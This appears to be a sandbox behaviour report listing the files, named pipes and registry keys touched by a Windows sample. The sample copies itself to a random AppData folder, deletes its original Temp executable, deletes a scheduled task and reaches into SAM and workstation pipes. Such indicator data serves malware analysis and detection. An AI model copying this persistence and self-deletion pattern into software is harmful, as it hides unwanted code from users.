C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\System32\netapi32.dll C:\Windows\System32\netutils.dll C:\Windows\System32\srvcli.dll C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44 C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029 C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec C:\Windows\sysnative\LogFiles\Scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4 C:\Windows\sysnative\LogFiles\Scm\5c0aeeea-c154-45be-8499-bea5f11baff6 C:\Windows\sysnative\LogFiles\Scm\a7c73732-9f11-4281-8d19-764d4ec9d94d C:\Windows\sysnative\LogFiles\Scm\ac4e5acf-89f7-4220-ba21-81ee183975e2 C:\Windows\sysnative\LogFiles\Scm\b4bdb6a0-417f-4e60-a0ac-aa00b1c79b4c C:\Windows\sysnative\LogFiles\Scm\be669c13-8165-4536-96d0-6d6c39292aae C:\Windows\sysnative\LogFiles\Scm\ca4b8ff2-a4d2-4d88-a52e-3a5bdaf7f56e C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50 C:\Windows\sysnative\LogFiles\Scm\fb3c354d-297a-4eb2-9b58-090f6361906b C:\Windows\sysnative\LogFiles\Scm\fdd56c73-f0d5-41b6-b767-6effd7966428 C:\Windows\sysnative\it-IT\radarrs.dll.mui C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat C:\Windows\Fonts\modern.fon C:\Windows\Fonts\roman.fon C:\Windows\Fonts\script.fon C:\Windows\Fonts\coure.fon C:\Windows\Fonts\serife.fon C:\Windows\Fonts\sserife.fon C:\Windows\Fonts\smalle.fon C:\Windows\Fonts\smallf.fon \??\PIPE\wkssvc C:\Windows\sysnative\dfdts.dll C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx C:\Windows\sysnative\RacEngn.dll C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-ReliabilityAnalysisComponent%4Operational.evtx C:\Windows\sysnative\wbem\WinMgmtR.dll C:\Windows\sysnative\shell32.dll C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx C:\Windows\sysnative\oleres.dll C:\Windows\sysnative\it-IT\KERNELBASE.dll.mui C:\Windows\sysnative\dfdts.dll.123.Manifest C:\Windows\sysnative\dfdts.dll.124.Manifest C:\Windows\sysnative\dfdts.dll.2.Manifest C:\Windows\sysnative\rundll32.exe C:\Windows\sysnative\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Uploader C:\Windows\sysnative\advapi32.dll C:\Windows\sysnative\drivers\acpi.sys C:\Windows\sysnative\drivers\ndis.sys C:\Windows\sysnative\drivers\mssmbios.sys C:\Windows\sysnative\drivers\hdaudbus.sys C:\Windows\sysnative\drivers\intelppm.sys C:\Windows\sysnative\drivers\portcls.sys C:\Windows\sysnative\drivers\monitor.sys C:\Windows\sysnative\wbem\WMIADAP.exe C:\Windows\appcompat\Programs\RecentFileCache.bcf C:\Windows\AppPatch\AppPatch64\sysmain.sdb C:\Windows\sysnative\wbem\ C:\Windows\SysWOW64\net.exe C:\Windows\AppPatch\sysmain.sdb C:\Windows\SysWOW64\ C:\Windows\SysWOW64\net1.exe C:\Windows\Temp\fwtsqmfile01.sqm C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\it-IT\sc.exe.mui C:\Windows\sysnative\wbem\WmiPrvSE.exe \??\WMIDataDevice C:\Windows\sysnative\it-IT\VssTrace.DLL.mui \??\PIPE\samr C:\Windows\sysnative\wbem\repository\MAPPING1.MAP C:\Windows\sysnative\wbem\repository\MAPPING2.MAP C:\Windows\sysnative\wbem\repository\MAPPING3.MAP C:\Windows\sysnative\wbem\repository\OBJECTS.DATA C:\Windows\sysnative\wbem\repository\INDEX.BTR \??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM \??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER C:\Windows\sysnative\it-IT\USER32.dll.mui C:\Windows\sysnative\it-IT\ADVAPI32.dll.mui C:\Windows\sysnative\wbem\it-IT\mofd.dll.mui
Write Files
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48 C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44 \??\PIPE\wkssvc C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-ReliabilityAnalysisComponent%4Operational.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx C:\Windows\appcompat\Programs\RecentFileCache.bcf C:\Windows\Temp\fwtsqmfile01.sqm \??\WMIDataDevice \??\PIPE\samr C:\Windows\sysnative\wbem\repository\WRITABLE.TST C:\Windows\sysnative\wbem\repository\MAPPING1.MAP C:\Windows\sysnative\wbem\repository\MAPPING2.MAP C:\Windows\sysnative\wbem\repository\MAPPING3.MAP C:\Windows\sysnative\wbem\repository\OBJECTS.DATA C:\Windows\sysnative\wbem\repository\INDEX.BTR \??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM \??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
Delete Files
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2288.31347515 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2288.31347515 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2288.31347765 C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Local\Temp\trip2323232.exe C:\Windows\sysnative\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Uploader
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TRIP2323232.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\443e7d6a\2a202db1 HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index36 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089 